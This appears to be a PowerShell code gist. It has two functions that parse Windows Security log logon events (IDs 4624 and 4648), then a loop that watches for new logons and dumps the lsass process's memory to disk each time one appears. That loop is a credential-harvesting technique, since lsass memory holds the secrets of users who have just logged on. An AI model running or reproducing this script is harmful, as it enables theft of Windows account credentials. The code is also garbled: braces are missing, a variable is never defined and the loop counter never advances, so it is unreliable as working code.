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Last active August 29, 2015 14:16
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#Number of minutes to go
[int]$MinutesToCheck = 10080
function Find-4648Logons
Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the
the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful
for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action.
Function: Find-4648Logons
Author: Joe Bialek, Twitter: @JosephBialek
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the
the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful
for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action.
Gets the unique 4648 logon events.
Github repo:
$ExplicitLogons = $SecurityLog | Where {$_.InstanceID -eq 4648}
$ReturnInfo = @{}
foreach ($ExplicitLogon in $ExplicitLogons)
$Subject = $false
$AccountWhosCredsUsed = $false
$TargetServer = $false
$SourceAccountName = ""
$SourceAccountDomain = ""
$TargetAccountName = ""
$TargetAccountDomain = ""
$TargetServer = ""
foreach ($line in $ExplicitLogon.Message -split "\r\n")
if ($line -cmatch "^Subject:$")
$Subject = $true
elseif ($line -cmatch "^Account\sWhose\sCredentials\sWere\sUsed:$")
$Subject = $false
$AccountWhosCredsUsed = $true
elseif ($line -cmatch "^Target\sServer:")
$AccountWhosCredsUsed = $false
$TargetServer = $true
elseif ($Subject -eq $true)
if ($line -cmatch "\s+Account\sName:\s+(\S.*)")
$SourceAccountName = $Matches[1]
elseif ($line -cmatch "\s+Account\sDomain:\s+(\S.*)")
$SourceAccountDomain = $Matches[1]
elseif ($AccountWhosCredsUsed -eq $true)
if ($line -cmatch "\s+Account\sName:\s+(\S.*)")
$TargetAccountName = $Matches[1]
elseif ($line -cmatch "\s+Account\sDomain:\s+(\S.*)")
$TargetAccountDomain = $Matches[1]
elseif ($TargetServer -eq $true)
if ($line -cmatch "\s+Target\sServer\sName:\s+(\S.*)")
$TargetServer = $Matches[1]
#Filter out logins that don't matter
if (-not ($TargetAccountName -cmatch "^DWM-.*" -and $TargetAccountDomain -cmatch "^Window\sManager$"))
$Key = $SourceAccountName + $SourceAccountDomain + $TargetAccountName + $TargetAccountDomain + $TargetServer
if (-not $ReturnInfo.ContainsKey($Key))
$Properties = @{
LogType = 4648
LogSource = "Security"
SourceAccountName = $SourceAccountName
SourceDomainName = $SourceAccountDomain
TargetAccountName = $TargetAccountName
TargetDomainName = $TargetAccountDomain
TargetServer = $TargetServer
Count = 1
Times = @($ExplicitLogon.TimeGenerated)
$ResultObj = New-Object PSObject -Property $Properties
$ReturnInfo.Add($Key, $ResultObj)
$ReturnInfo[$Key].Times += ,$ExplicitLogon.TimeGenerated
return $ReturnInfo
function Find-4624Logons
Find all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do
network logons in to the server, what accounts RDP in, what accounts log in locally, etc...
Function: Find-4624Logons
Author: Joe Bialek, Twitter: @JosephBialek
Required Dependencies: None
Optional Dependencies: None
Version: 1.1
Find all unique 4624 Logon events to the server. This will tell you who is logging in and how. You can use this to figure out what accounts do
network logons in to the server, what accounts RDP in, what accounts log in locally, etc...
Find unique 4624 logon events.
Github repo:
Param (
$Logons = $SecurityLog | Where {$_.InstanceID -eq 4624}
$ReturnInfo = @{}
foreach ($Logon in $Logons)
$SubjectSection = $false
$NewLogonSection = $false
$NetworkInformationSection = $false
$AccountName = ""
$AccountDomain = ""
$LogonType = ""
$NewLogonAccountName = ""
$NewLogonAccountDomain = ""
$WorkstationName = ""
$SourceNetworkAddress = ""
$SourcePort = ""
foreach ($line in $Logon.Message -Split "\r\n")
if ($line -cmatch "^Subject:$")
$SubjectSection = $true
elseif ($line -cmatch "^Logon\sType:\s+(\S.*)")
$LogonType = $Matches[1]
elseif ($line -cmatch "^New\sLogon:$")
$SubjectSection = $false
$NewLogonSection = $true
elseif ($line -cmatch "^Network\sInformation:$")
$NewLogonSection = $false
$NetworkInformationSection = $true
elseif ($SubjectSection)
if ($line -cmatch "^\s+Account\sName:\s+(\S.*)")
$AccountName = $Matches[1]
elseif ($line -cmatch "^\s+Account\sDomain:\s+(\S.*)")
$AccountDomain = $Matches[1]
elseif ($NewLogonSection)
if ($line -cmatch "^\s+Account\sName:\s+(\S.*)")
$NewLogonAccountName = $Matches[1]
elseif ($line -cmatch "^\s+Account\sDomain:\s+(\S.*)")
$NewLogonAccountDomain = $Matches[1]
elseif ($NetworkInformationSection)
if ($line -cmatch "^\s+Workstation\sName:\s+(\S.*)")
$WorkstationName = $Matches[1]
elseif ($line -cmatch "^\s+Source\sNetwork\sAddress:\s+(\S.*)")
$SourceNetworkAddress = $Matches[1]
elseif ($line -cmatch "^\s+Source\sPort:\s+(\S.*)")
$SourcePort = $Matches[1]
#Filter out logins that don't matter
if (-not ($NewLogonAccountDomain -cmatch "NT\sAUTHORITY" -or $NewLogonAccountDomain -cmatch "Window\sManager"))
$Key = $AccountName + $AccountDomain + $NewLogonAccountName + $NewLogonAccountDomain + $LogonType + $WorkstationName + $SourceNetworkAddress + $SourcePort
if (-not $ReturnInfo.ContainsKey($Key))
$Properties = @{
LogType = 4624
LogSource = "Security"
SourceAccountName = $AccountName
SourceDomainName = $AccountDomain
NewLogonAccountName = $NewLogonAccountName
NewLogonAccountDomain = $NewLogonAccountDomain
LogonType = $LogonType
WorkstationName = $WorkstationName
SourceNetworkAddress = $SourceNetworkAddress
SourcePort = $SourcePort
Count = 1
Times = @($Logon.TimeGenerated)
$ResultObj = New-Object PSObject -Property $Properties
$ReturnInfo.Add($Key, $ResultObj)
$ReturnInfo[$Key].Times += ,$Logon.TimeGenerated
return $ReturnInfo
$SecurityLogStatic = Get-EventLog -LogName Security
$UsersLocal = Find-4624Logons -SecurityLog $SecurityLogStatic
$UserLocalCount = $UsersLocal.Count
$UsersRemote = Find-4648Logons -SecurityLog $SecurityLogStatic
$UserRemoteCount = $Users.Count
While($i -ne $MinutesToCheck)
$SecurityLog = Get-EventLog -LogName Security
$UsersLocalTmp = Find-4624Logons -SecurityLog $SecurityLog
$UsersRemoteTmp = Find-4648Logons -SecurityLog $SecurityLog
if (($UsersLocalTmp.Count -ne $UserLocalCount) -or $UsersRemoteTmp.Count -ne $UserRemoteCount)
Write-Host "**********Someone just logged on!*************"
Write-Host "Currently Logged in local users:"
Write-Host "$UsersLocalTmp"
Write-Host "Currently Logged in remote users:"
Write-Host "$UsersRemoteTmp"
Write-Host "Dumping memory to C:\number.dmp:"
$out = "$i" + ".dmp"
Get-Process lsass | Out-Update -DumpFilePath "C:\" -ProcessFileName $out
Start-Sleep -Seconds 60
Write-Host "."
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